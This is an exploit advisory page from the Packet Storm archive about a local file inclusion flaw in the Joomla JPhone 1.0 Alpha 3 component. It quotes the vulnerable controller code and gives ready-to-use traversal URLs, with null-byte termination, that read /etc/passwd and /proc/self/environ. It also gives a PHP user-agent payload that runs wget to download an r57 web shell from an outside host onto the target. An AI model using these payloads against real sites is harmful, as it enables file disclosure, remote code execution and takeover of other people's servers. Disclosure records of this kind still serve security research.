exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Jphone Local File Inclusion

Joomla Jphone Local File Inclusion
Posted Sep 11, 2010
Authored by Chip D3 Bi0s

The Joomla Jphone component suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 3fc8914ea1ddd9c4319aca9d29b3fc3e67a5b36169442c38e3802ee62746131b

Joomla Jphone Local File Inclusion

Change Mirror Download
JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
=========================================================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios[at]gmail[dot]com
- Group : LatinHackTeam
- Date : 2010-09-10
- Where : From Remote

-------------------------------------------------------------------------------------
Affected software description

Application : Jphone
Developer : Urs Kobald
Compatibility : 1.0 Alpha 3
License : GPLv2 or later
Date Added : 14 Aug 2010
website : http://www.4you-studio.com
Download : http://www.joomlafrance.org/telecharger/download/Jphone/344bbad81cf491b6e5215e3f15fc3fb7.html

I. BACKGROUND

Called Jphone, component agency 4you studio allows for your Joomla adapted mobile
version with a real interface using page transition effects rather pro
(the cube effect and popup are very nice).

Consisting of a component and a plugin for Joomla, it is after activating the plugin
define a menu (the menu management of Joomla). This is to link the specific component
to display your content. Currently seen by the articles, categories, sections are set
but also those contacts and links Web (Two native Joomla components).
The installation procedure is shown in the download package.

In addition, the proposed version is an alpha version
(therefore usable only for testing purposes) but resulted entirely in French.
Feel free to share your opinion on the forum.
Support for Android and PalmPre should be functional (not tested)

II. DESCRIPTION

Some Local File inclusion vulnerabilities exist in Component Joomla Jphone 1.0 Alpha 3.



III. ANALYSIS

The bug is in the following files, specifying the lines

/components/com_jphone/jphone.php



[63] if($controller = JRequest::getVar('controller')) {
[64]
[65] require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');

Explanation:As noted in the line [65] $controller
nowhere is filtered, which result is lfi as is known to pass '.php' use %00 :)


IV. EXPLOITATION

http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd%00
{LFI}=../../../../../../../../../../proc/self/environ%00

changing the user agent for something so:
<?system('wget http://chipdebios.com/r57.txt -O r57.php');?>

A special greeting to my good friends:
F3l0m4n, R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)



+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close